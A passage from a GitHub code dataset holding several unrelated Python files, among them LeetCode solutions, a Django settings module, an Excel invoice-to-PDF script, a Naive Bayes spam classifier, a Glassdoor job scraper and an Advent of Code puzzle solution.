Default, with a minimum of ``(1, 23)``, ``\"requires >=\n 1.23\"``\n\n :raises FeatureUnavailable: If the minimum version is not met\n\n :since: 1.0\n \"\"\"\n\n if version_check(session, minimum=minimum):\n return True\n\n if message is None:\n if isinstance(minimum, (list, tuple)):\n minimum = \".\".join(str(m) for m in minimum)\n message = f\"requires >= {minimum}\"\n\n raise FeatureUnavailable(message)\n\n\n#\n# The end.\n","repo_name":"obriencj/koji-smoky-dingo","sub_path":"kojismokydingo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":37722,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"32671005507","text":"from PyQt6.QtWidgets import QMainWindow\n\nfrom simsapa.keyboard import keyboard\n\nfrom simsapa import logger\nfrom simsapa.app.actions_manager import ActionsManager\nfrom simsapa.app.hotkeys_manager_interface import HotkeysManagerInterface\n\nclass HotkeysManagerWindowsMac(HotkeysManagerInterface):\n def __init__(self, actions_manager: ActionsManager):\n super().__init__(actions_manager)\n\n try:\n keyboard.add_hotkey(\"ctrl+shift+f6\", self.show_word_lookup, suppress=True)\n keyboard.add_hotkey(\"ctrl+shift+s\", self.lookup_clipboard_in_suttas, suppress=True)\n keyboard.add_hotkey(\"ctrl+shift+g\", self.lookup_clipboard_in_dictionary, suppress=True)\n except Exception as e:\n logger.error(f\"Can't init hotkeys: {e}\")\n\n def setup_window(self, window: QMainWindow):\n print(\"NotImplementedError %s\" % str(window))\n pass\n\n def unregister_all_hotkeys(self):\n logger.info(\"unregister_all_hotkeys()\")\n try:\n keyboard.unhook_all_hotkeys()\n except Exception as e:\n logger.error(e)\n","repo_name":"simsapa/simsapa","sub_path":"simsapa/app/hotkeys_manager_windows_mac.py","file_name":"hotkeys_manager_windows_mac.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"28991015738","text":"# Python Crash Course: A Hands-On, Project-Based Introduction To Programming\n#\n# Name: Mark Lester Apuya\n# Date: 05/29/2021\n#\n# Chapter 8: Functions\n#\n# Exercise 8.5 Cities:\n# Write a function called describe_city() that accepts the name of a city and \n# its country. The function should print a simple sentence, such as Reykjavik \n# is in Iceland. Give the parameter for the country a default value. 
Call your \n# function for three different cities, at least one of which is not in the \n# default country.\n\ndef describe_city(city, country='united states'):\n \"\"\"\n Describes a city.\n \"\"\"\n print(f\"{city.title()} is in {country.title()}.\")\n\ndescribe_city('honolulu')\ndescribe_city('los angeles')\ndescribe_city('tokyo', 'japan')","repo_name":"apuya/python_crash_course","sub_path":"Part_1_Basics/Chapter_8_Functions/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72131058638","text":"class Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n maxProfit,minPrice = 0,float('inf')\n for price in prices:\n minPrice = min(minPrice,price)\n profit = price - minPrice\n maxProfit = max(maxProfit, profit)\n return maxProfit\n\nif __name__=='__main__':\n prices = [7,6,4,3,1] #[7,1,5,3,6,4]\n s = Solution()\n res = s.maxProfit(prices)\n print(res)","repo_name":"JohnnySu-SJTUer/LeetCodeLearning","sub_path":"121_easy_maxProfit1.py","file_name":"121_easy_maxProfit1.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"23745451082","text":"# https://leetcode.com/problems/jewels-and-stones/\r\n\r\nclass Solution:\r\n def numJewelsInStones(self, jewels: str, stones: str) -> int:\r\n \r\n d = dict()\r\n\r\n c=0\r\n\r\n for i in range(0,len(stones)):\r\n d[stones[i]]=0\r\n\r\n for i in range(0,len(jewels)):\r\n d[jewels[i]]=1\r\n\r\n for i in range(0,len(stones)):\r\n if d[stones[i]]==1:\r\n c+=1\r\n\r\n return c\r\n\r\nif __name__ == \"__main__\":\r\n sol = Solution()\r\n print(sol.numJewelsInStones(\"aA\",\"aAAbbbb\"))\r\n\r\n ","repo_name":"chamox/tech-mentorship","sub_path":"module_1/jewels_and_stones.py","file_name":"jewels_and_stones.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"3999651434","text":"# Definition for a binary tree node.\nimport unittest\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n # Beats 78%.\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n result = []\n\n stack = []\n if root is not None:\n stack.append(root)\n while len(stack) != 0:\n top_element = stack.pop()\n result.append(top_element.val)\n if top_element.right is not None:\n stack.append(top_element.right)\n if top_element.left is not None:\n stack.append(top_element.left)\n return result\n\n\nclass SolutionTest(unittest.TestCase):\n def test_solution(self):\n s = Solution()\n\n # Case 1: simple tree\n root = TreeNode(1)\n left = TreeNode(2)\n right = TreeNode(3)\n root.left = left\n root.right = right\n\n self.assertEqual([1,2,3], s.preorderTraversal(root))\n\n # Case 2: root -> left -> left -> left\n root = TreeNode(-1)\n temp_root = root\n for i in range(5):\n node = TreeNode(i)\n temp_root.left = node\n temp_root = node\n\n self.assertEqual([-1, 0, 1, 2, 3, 4], s.preorderTraversal(root))\n\n # Case 3: root - right -> right -> right\n root = TreeNode(-1)\n temp_root = root\n for i in range(5):\n node = TreeNode(i)\n temp_root.right = node\n temp_root = node\n\n self.assertEqual([-1, 0, 1, 2, 3, 4], s.preorderTraversal(root))\n\n # Case 4: a normal tree\n '''\n 0\n / \\\n 1 2\n / \\ \\\n 
3 4 5\n / \\ / /\n 6 7 8 9\n\n '''\n root = TreeNode(0)\n root.left = TreeNode(1)\n root.right = TreeNode(2)\n root.left.left = TreeNode(3)\n root.left.right = TreeNode(4)\n root.left.left.left = TreeNode(6)\n root.left.left.right = TreeNode(7)\n root.left.right.left = TreeNode(8)\n root.right.right = TreeNode(5)\n root.right.right.left = TreeNode(9)\n self.assertEqual([0, 1, 3, 6, 7, 4, 8, 2, 5, 9], s.preorderTraversal(root))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jicahoo/pythonalgr","sub_path":"leetcode/144_BinaryTreePreorderTraversal.py","file_name":"144_BinaryTreePreorderTraversal.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"3379716725","text":"import pandas as pd\nimport openpyxl\nfrom win32com import client\nimport win32api\nimport os\n\n\n#load info of customer from masterlist\n\ndata = pd.read_excel('NameList.xlsx', sheet_name = ['template'])\nmasterList = data[\"template\"]\ncustomerList = masterList.head(masterList.index.stop)\nexcel = client.Dispatch(\"Excel.Application\")\n\n#extract info from raw list and append to array\n\ncustomerDetails = []\n\nfor ind,row in customerList.iterrows():\n f=[]\n for z in row:\n f.append(z)\n customerDetails.append(f)\nprint(customerDetails)\n\n#append customer details array with CIPL template\n\nciplWorkbook=openpyxl.load_workbook('CIPL.xlsx')\nciWorksheet = ciplWorkbook[\"CI\"]\nplWorksheet= ciplWorkbook[\"PL\"]\n\n# to get the location of the current python file\nbasedir = os.path.dirname(os.path.abspath(__file__))\n\n# to join it with the filename\ncategorization_file = os.path.join(basedir,'CIPL.xlsx')\n\nfor details in customerDetails:\n\n #assign variables to the info array\n customerNames = details[0]\n attention = details[1]\n customerAddress = details[2]\n customerPhone = details[3]\n ciNo = details[4]\n plNo = details[5]\n poRef = details[6]\n\n #append info to the CI sheet\n \n ciWorksheet['D12'] = customerNames\n ciWorksheet['D14'] = customerAddress\n ciWorksheet['D20'] = attention\n ciWorksheet['D21'] = customerPhone\n ciWorksheet['L12'] = ciNo\n ciWorksheet['L13'] = poRef\n\n #append info to the PL sheet\n\n plWorksheet['D12'] = customerNames\n plWorksheet['D14'] = customerAddress\n plWorksheet['D20'] = attention\n plWorksheet['D21'] = customerPhone\n plWorksheet['L12'] = plNo\n plWorksheet['L13'] = poRef\n\n #save the excel with the amended info\n ciplWorkbook.save(\"CIPL.xlsx\")\n sheets = excel.Workbooks.Open(categorization_file)\n work_sheets_CI = sheets.Worksheets[0]\n work_sheets_PL = sheets.Worksheets[1]\n \n # Convert into PDF File\n ci_pdf = f'{ciNo}.pdf'\n pl_pdf = f'{plNo}.pdf'\n\n ci_file = os.path.join(basedir, ci_pdf)\n pl_file = os.path.join(basedir, pl_pdf)\n\n work_sheets_CI.ExportAsFixedFormat(0, ci_file)\n print(f\"{ciNo}({customerNames}) has been successfully saved as PDF\")\n \n work_sheets_PL.ExportAsFixedFormat(0, pl_file)\n print(f\"{plNo}({customerNames}) has been successfully saved as PDF\")\n\n sheets.Close(True)\n","repo_name":"mirzafahmi/CIPL","sub_path":"CIPL.py","file_name":"CIPL.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1125432562","text":"import math\nfrom collections import defaultdict\n\n# Step 1: Load the dataset\ndef load_dataset(file_path):\n dataset = []\n with open(file_path, 'r') as file:\n for line in file:\n label, text = 
line.strip().split('\\t')\n dataset.append((text, label))\n return dataset\n\n# Step 2: Split the dataset into training and testing sets\ndef split_dataset(dataset, split_ratio=0.8):\n split_index = int(len(dataset) * split_ratio)\n train_set = dataset[:split_index]\n test_set = dataset[split_index:]\n return train_set, test_set\n\n# Step 3: Train the Naive Bayes classifier\ndef train_naive_bayes(train_set):\n # Count the occurrences of each word in each class, and the number of documents per class\n class_word_counts = defaultdict(lambda: defaultdict(int))\n class_doc_counts = defaultdict(int)\n vocabulary = set()\n\n for text, label in train_set:\n words = text.lower().split()\n class_word_counts[label]['__total__'] += len(words)\n class_doc_counts[label] += 1 # the prior needs document counts, not word counts\n\n for word in words:\n class_word_counts[label][word] += 1\n vocabulary.add(word)\n\n # Calculate the prior probability of each class\n total_docs = len(train_set)\n class_priors = {label: math.log(count / total_docs) for label, count in class_doc_counts.items()}\n\n # Calculate the conditional probabilities\n class_cond_probs = defaultdict(lambda: defaultdict(float))\n for label in class_word_counts:\n for word in vocabulary:\n word_count = class_word_counts[label][word]\n total_words_in_class = class_word_counts[label]['__total__']\n class_cond_probs[label][word] = math.log((word_count + 1) / (total_words_in_class + len(vocabulary)))\n\n return class_priors, class_cond_probs, vocabulary\n\n# Step 4: Predict the class of a test instance\ndef predict_naive_bayes(text, class_priors, class_cond_probs, vocabulary):\n words = text.lower().split()\n\n scores = {}\n for label in class_priors:\n score = class_priors[label]\n for word in words:\n if word in vocabulary:\n score += class_cond_probs[label][word]\n scores[label] = score\n\n predicted_label = max(scores, key=scores.get)\n return predicted_label\n\n# Step 5: Evaluate the classifier using the test set\ndef evaluate_naive_bayes(test_set, class_priors, class_cond_probs, vocabulary):\n correct_predictions = 0\n\n for text, label in test_set:\n predicted_label = predict_naive_bayes(text, class_priors, class_cond_probs, vocabulary)\n if predicted_label == label:\n correct_predictions += 1\n\n accuracy = correct_predictions / len(test_set)\n return accuracy\n\n# Load the dataset\ndataset = load_dataset('sms_spam_collection.txt')\n\n# Split the dataset into training and testing sets\ntrain_set, test_set = split_dataset(dataset, split_ratio=0.8)\n\n# Train the Naive Bayes classifier\nclass_priors, class_cond_probs, vocabulary = train_naive_bayes(train_set)\n\n# Evaluate the classifier\naccuracy = evaluate_naive_bayes(test_set, class_priors, class_cond_probs, vocabulary)\nprint(f\"Accuracy: {accuracy:.2%}\")\n","repo_name":"NeedAvailableName/ML-DM","sub_path":"bayes/sms_spam.py","file_name":"sms_spam.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15897610688","text":"productoTerminadoUno = {\n \"referencia\": 5087,\n \"marca\": \"Americanino\",\n \"descripcion\": \"Chompa de acampargo\",\n \"color\": \"Naranja\",\n \"costoUnitario\": 100000,\n \"disponibleBodegan\": True,\n \"costoVenta\": 850000,\n \"puntosVenta\": [\n \"Cc Mayorca\",\n \"Terminal del Norte\",\n \"Puerta del norte\",\n \"Centro de la moda\",\n ],\n}\n\nproductoTerminadoDos = {\n \"referencia\": 5088,\n \"marca\": \"Americanino\",\n \"descripcion\": \"Camiseta Polo\",\n \"color\": \"Azul oscuro\",\n \"costoUnitario\": 
30000,\n \"disponibleBodegan\": True,\n \"costoVenta\": 150000,\n \"puntosVenta\": [\n \"Cc Mayorca\",\n \"Terminal del Norte\",\n \"Puerta del norte\",\n \"Centro de la moda\",\n ],\n}\n\n# CREATING A LIST OF DICTIONARIES\nproductos = [productoTerminadoUno, productoTerminadoDos]\n\n# Iterating over a list with a FOR loop\n\"\"\"for contador in range(1,10,2):\n print(contador)\"\"\"\n\nfor producto in productos:\n for puntodeVenta in producto[\"puntosVenta\"]:\n print(puntodeVenta)\n","repo_name":"lesuduque/inventariopythonuribe","sub_path":"diccionario.py","file_name":"diccionario.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18847956866","text":"# Django settings for gonzo project.\nimport os\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', 'your_email@domain.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': '', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'UTC'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, '../media/')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/admin/media/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '%%wx$yiag9%t+ncj!ozqqid4b=wjlx2ra*=(p284j&uezh@@mi'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.request\",\n \"django.contrib.messages.context_processors.messages\",\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.gzip.GZipMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware'\n)\n\nROOT_URLCONF = 'gonzo.urls'\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_ROOT, '../templates/'),\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'gonzo.hunt',\n 'gonzo.api',\n 'gonzo.account',\n 'gonzo.oauth',\n 'gonzo.phrase',\n 'gonzo.webapp',\n 'gonzo.utils',\n 'gonzo.connectors.twitter',\n 'gonzo.connectors.email',\n 'debug_toolbar'\n)\nCELERY_IMPORTS=(\n 'gonzo.account.tasks',\n 'gonzo.hunt.tasks'\n)\n\n#\n# Authentication backends\n#\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'gonzo.connectors.twitter.backends.TwitterAuthBackend'\n)\n\n#\n# Email\n#\nEMAIL_HOST='localhost'\nEMAIL_PORT=1025\n\n#\n# Authentication configuration\n#\nAUTH_PROFILE_MODULE='account.Profile'\nLOGIN_URL='/account/signin/'\nLOGIN_REDIRECT_URL='/account/profile/'\nSIGNUP_EMAIL_WHITELIST=()\n\n# Hunt email prefix\nHUNT_EMAIL_USER='hunt'\n\nfrom datetime import timedelta\n\n# TODO: Split these out into separate variables,\n# because this way makes it damn near impossible to override a single one.\nGAME_SETTINGS={\n # If True, it will delete any finished and unplayed hunts\n # (a hunt in which no one has voted is considered \"unplayed\")\n 'delete_unplayed': True,\n # If True, we will create a new hunt if there are none current\n 'keep_active': True,\n # Username of the default owner.\n 'default_owner': 'huntmaster',\n # Default duration\n 'default_duration': timedelta(days=1),\n}\n# Allow the same user to submit as many photos to a hunt.\n# This really only should be used for debugging.\nGAME_ALLOW_MULTI_SUBMIT=False\n\n#\n# Debug toolbar\n#\nINTERNAL_IPS=('127.0.0.1',)\nDEBUG_TOOLBAR_CONFIG={\n 'INTERCEPT_REDIRECTS': False\n}\n\n\nimport sys\n\nlocal_settings_name = os.environ.get('GONZO_LOCAL_SETTINGS_MODULE', 'local_settings')\ntry:\n __import__(local_settings_name)\n\n local = sys.modules[local_settings_name]\n this = sys.modules[__name__]\n\n # This mimics 'from local_settings import *'\n for name in dir(local):\n if not 
name.startswith('_'):\n setattr(this, name, getattr(local, name))\n\nexcept ImportError:\n pass\n\n","repo_name":"paulcwatts/1hph","sub_path":"gonzo/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"38026400633","text":"import mechanicalsoup\nimport json\nfrom random import randint\nimport os\n\n## https://developers.whatismybrowser.com/useragents/explore/\nagents = [\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n'Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',\n'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',\n'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Mwendo/1.1.5 Safari/537.21',\n'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',\n'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991'\n]\nindex = randint(0, len(agents)-1)\nagent = agents[index]\nurl = 'https://www.glassdoor.ie/Job/sydney-research-engineer-jobs-SRCH_IL.0,6_IC2235932_KO7,24.htm'\nbrowser = mechanicalsoup.StatefulBrowser(\n soup_config = {'features': 'lxml'}, # Use the lxml HTML parser\n raise_on_404 = True,\n user_agent = agent,\n)\nbrowser.open(url)\nsoup = browser.get_current_page()\nlinks = soup.find_all(name='div',attrs={'class':'flexbox jobTitle'})\nlocations = soup.find_all(name='div',attrs={'class':'flexbox empLoc'})\nprint(len(links), len(locations))\nbase_url = 'https://www.glassdoor.com'\n\n# for i in links:\n# print({'title':i.div.a.string, 'url':base_url + i.div.a['href']})\n\n# for i in locations:\n# print({'employer':i.div.contents[0].strip(), 'location':i.div.contents[1].string})\n\ntitle_url = [{'title':i.div.a.string, 'url':base_url + i.div.a['href']} for i in links]\nemp_loc = [{'employer':i.div.contents[0].strip(), 'location':i.div.contents[1].string} for i in locations]\n\ndict_list = list(zip(title_url, emp_loc))\n# print(dict_list[0])\nr = [{**i[0], **i[1]} for i in zip(title_url, emp_loc)]\nprint(r)\n\nans = soup.prettify()\n# print(ans)\nprint(index, agent)\nfilename = os.path.join(os.getcwd(), 'spider.txt')\nprint(filename)\nwith open(filename, 'w') as text_file:\n print(ans, file=text_file)\nbrowser.close()\n\n# import sys\n# print(os.getcwd())\n# print(sys.argv[0])\n# print(os.path.dirname(os.path.realpath('__file__')))\n","repo_name":"luosz/colab","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70633443351","text":"import os\n\ntrees = []\n\ndef import_trees(tree_file):\n \"\"\"\n Import the file containing \"trees\" which are numbers arranged in a grid.\n Each number is converted to an integer and stored into a multidimensional array.\n Eg: A 3x3 grid of incrementing numbers stores the following: [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n Args:\n tree_file (str): The filename (or filepath) containing the \"trees\" to be imported\n \"\"\"\n global trees\n try:\n with open(tree_file, \"r\") as f:\n # create a list of each line in the file\n file_lines = f.readlines()\n\n # loop through each line so we can break up the line into a list of numbers\n for line in 
file_lines:\n\n # in one fell swoop we strip the string of its newline, convert each number to an integer and create a list containing those numbers\n # we go through the trouble of converting the integers because we want to be able to compare the tree heights against each other\n line_array = [int(x) for x in list(line.strip())]\n\n # now we just append this array to our multidimensional array\n trees.append(line_array)\n except Exception as e:\n print(f\"Error opening tree file: {e}\")\n exit(1)\n\ndef color_print(color, text, end = \"\\n\"):\n \"\"\"\n Prints the chosen message in a specific color to the terminal.\n Available colors are: purple, blue, cyan, green, orange, red, underline\n (PS: It pains me to type \"color\" instead of \"colour\" but that's how the cookie crumbles xD)\n\n Args:\n color (str) : The color used to print the message\n text (str) : The text to print in the console\n end (str) : The character to end the print with (default is newline)\n \"\"\"\n all_colors = {\n \"purple\": \"\\033[95m\",\n \"blue\": \"\\033[94m\",\n \"cyan\": \"\\033[96m\",\n \"green\": \"\\033[92m\",\n \"orange\": \"\\033[93m\",\n \"red\": \"\\033[91m\",\n \"underline\": \"\\033[4m\"\n }\n print(f\"{all_colors[color]}{text}\"+\"\\033[0m\", end = end)\n\ndef search_left_and_right(row):\n global trees\n visible_indexes = []\n\n # we search from left to right, counting the number of visible trees in that direction\n # the range is len(row)-2 because -1 ensures we stay within range of the array and -2 ensures we don't check the last tree in the row (it's always visible)\n biggest_index = 0\n for v in range(0, len(row)-2):\n # if the tree to the right is taller than the current tallest tree, set it as the tallest and remember its index\n if row[v+1] > row[biggest_index]:\n biggest_index = v+1\n visible_indexes.append(v+1)\n\n # now we search from right to left, stopping if we encounter the tallest tree from the left-to-right search\n biggest_index = len(row)-1\n for v in range(len(row)-1, 1, -1):\n \n # if we encounter a tree that is already visible, we can stop checking the remaining trees in the row\n if (v-1) in visible_indexes:\n break\n \n # as before, we check if the tree to the left is taller than the current tallest tree\n if row[v-1] > row[biggest_index]:\n biggest_index = v-1\n visible_indexes.append(v-1)\n return visible_indexes\n\ndef calc_visible_trees():\n global trees\n visible_tree_coordinates = set()\n\n # # preview the tree layout\n # print(\"Tree Layout:\\n\")\n # for row in trees:\n # for tree in row:\n # print(tree, end=\"\")\n # print()\n # print(f\"\\n{'-'*48}\\n\")\n \n # search rows for trees\n for x in range(1, len(trees)-1):\n # pass each row to the search function and store tree coordinates as (row, column) into the main coord set\n for coord in search_left_and_right(trees[x]):\n visible_tree_coordinates.add((x, coord))\n\n # search columns for trees (we can re-use the same function used with rows by treating a top-and-bottom search as left-and-right)\n for x in range(1, len(trees[0])-1):\n # pass each column to the search function and store tree coordinates as (row, column) into the main coord set\n col = [row[x] for row in trees]\n for coord in search_left_and_right(col):\n visible_tree_coordinates.add((coord, x))\n\n \n color_print(\"underline\", f\"Final Tree Grid:\")\n print(\"Edge trees are colored blue\\nInternal visible trees are colored green\\n\")\n\n # print the final grid with colored trees, blue for edge trees and green for visible trees\n for row_index in range(0, len(trees)):\n for 
column_index in range(0, len(trees[row_index])):\n if row_index == 0 or row_index == len(trees)-1 or column_index == 0 or column_index == len(trees[0])-1:\n # this tree is on the edge, so it's visible (and we'll print in blue to signify this)\n color_print(\"blue\", f\"{trees[row_index][column_index]}\", end=\" \")\n else:\n # the tree isn't on an edge, check if we found its visible and if so, print it in green\n if (row_index, column_index) in visible_tree_coordinates:\n color_print(\"green\", f\"{trees[row_index][column_index]}\", end=\" \")\n else:\n print(f\"{trees[row_index][column_index]}\", end=\" \")\n print()\n\n # calculate the number of visible trees, starting with the edge trees and adding the number of visible trees within the grid\n both_columns = len(trees[0]) * 2\n both_rows = (len(trees) - 2) * 2\n edge_tree_count = both_columns + both_rows\n color_print(\"underline\", \"\\n\\nVisible Tree Count:\")\n print(f\"Edge trees: {edge_tree_count}\")\n print(f\"Internal trees: {len(visible_tree_coordinates)}\")\n print(f\"Total visible: {len(visible_tree_coordinates) + edge_tree_count}\\n\\n\\n\")\n\ndef main():\n global trees\n\n # import trees from file\n import_trees(\"08/trees.txt\")\n\n # calculate the number of visible trees\n calc_visible_trees()\n\n color_print(\"underline\", \"Part Two: Scenic Score\\n\")\n\n # loop through trees that are within the grid (ie: not edge trees) and calculate the scenic score for each\n biggest_scenic_score = 0\n\n for row_index in range(1, len(trees)-1):\n for column_index in range(1, len(trees)-1):\n left_score, right_score, top_score, bot_score = 0, 0, 0, 0\n # print(f\"row_index: {row_index}, column_index: {column_index}, value: {trees[row_index][column_index]}\")\n \n # left scenic score\n left_index = column_index - 1\n while True:\n # print(f\"looking left to column index {left_index} at tree {trees[row_index][left_index]} ...\")\n left_score += 1\n if trees[row_index][left_index] >= trees[row_index][column_index]:\n # print(f\"left tree is equal or bigger, breaking ...\")\n break\n elif left_index == 0:\n # print(\"no more trees to the left, breaking ...\")\n break\n # print(\"left tree is smaller, moving to next tree ...\")\n left_index -= 1\n \n # right scenic score\n right_index = column_index + 1\n while True:\n # print(f\"looking right to column index {right_index} at tree {trees[row_index][right_index]} ...\")\n right_score += 1\n if trees[row_index][right_index] >= trees[row_index][column_index]:\n # print(f\"right tree is equal or bigger, breaking ...\")\n break\n elif right_index == len(trees[0])-1:\n # print(\"no more trees to the right, breaking ...\")\n break\n # print(\"right tree is smaller, moving to next tree ...\")\n right_index += 1\n \n # top scenic score\n top_index = row_index - 1\n while True:\n # print(f\"looking upwards to row index {top_index} at tree {trees[top_index][column_index]} ...\")\n top_score += 1\n if trees[top_index][column_index] >= trees[row_index][column_index]:\n # print(f\"top tree is equal or bigger, breaking ...\")\n break\n elif top_index == 0:\n # print(\"no more trees upwards, breaking ...\")\n break\n # print(\"top tree is smaller, moving to next tree ...\")\n top_index -= 1\n\n # bot scenic score\n bot_index = row_index + 1\n while True:\n # print(f\"looking downwards to row index {bot_index} at tree {trees[bot_index][column_index]} ...\")\n bot_score += 1\n if trees[bot_index][column_index] >= trees[row_index][column_index]:\n # print(f\"bot tree is equal or bigger, breaking ...\")\n 
break\n elif bot_index == len(trees)-1:\n # print(\"no more trees downwards, breaking ...\")\n break\n # print(\"bottom tree is smaller, moving to next tree ...\")\n bot_index += 1\n\n this_scenic_score = left_score * right_score * top_score * bot_score\n # print(f\"left score: {left_score}\\nright score: {right_score}\\ntop score: {top_score}\\nbottom score: {bot_score}\\nscenic score: {this_scenic_score}\\n\\n\")\n if this_scenic_score > biggest_scenic_score:\n biggest_scenic_score = this_scenic_score\n # print()\n\n print(f\"Biggest scenic score: {biggest_scenic_score}\")\n\nif __name__ == \"__main__\":\n os.system('cls' if os.name == 'nt' else 'clear')\n main() # run main function\n print(\"\\n\\n\")","repo_name":"elijahw0lf/adventofcode-2022","sub_path":"08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71903459993","text":"import os\nfrom dotenv import load_dotenv\nfrom qdrant_client import models, QdrantClient\nfrom sentence_transformers import SentenceTransformer\n\nload_dotenv()\nqdrant_location = os.getenv(\"QDRANT_LOCATION\")\nqdrant_port = os.getenv(\"QDRANT_PORT\")\nqdrant = QdrantClient(location=qdrant_location, port=qdrant_port)\nencoder = SentenceTransformer('all-MiniLM-L6-v2') \n\ntry:\n qdrant.recreate_collection(\n collection_name=\"vectors\",\n vectors_config=models.VectorParams(\n size=encoder.get_sentence_embedding_dimension(), # Vector size is defined by used model\n distance=models.Distance.COSINE\n )\n )\nexcept Exception as e:\n 